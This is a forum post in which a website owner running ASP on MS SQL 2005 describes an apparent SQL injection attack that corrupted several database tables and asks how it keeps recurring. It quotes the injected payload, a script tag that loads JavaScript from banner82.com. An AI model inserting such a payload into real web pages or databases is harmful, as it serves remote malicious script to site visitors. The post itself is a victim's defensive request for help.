Hello,
I have fallen victim to an SQL injection attack (or what seems to be) and have had three Tables in a database corrupted with a script string reading <script src=
http://www.banner82.com/b.js></s
cript> and placing itself in every row and as many columns as it can.
I believe it may be caused by poor coding on my part (ie. not using parameterized coding in my SQL statements) but what I cannot figure out is how it manages to carry on. I have done the following preventive measures
1) Restored old Table in a new Table under a different name
2) Renamed every column in the new table
But before I have even managed to get around to changing the ASP code on my website to reflect these changes the data in the new table is getting corrupted!!
Only three Tables (out of many more) are affected but these are the three tables normally executed when a user is on my website - however the new table with the restored data has not been executed through my website yet at all! As far as any web user is concerned it doesn't even exist (I only just created the damn thing).
Can anyone give me a clue as to how it does it and how it manages to do it with such lightning speed???
No point restoring a DB if I can't stop it from corrupting itself the very next minute...
I use MS SQL 2005 on a Windows Server 2003 - my coding language is ASP
Start Free Trial
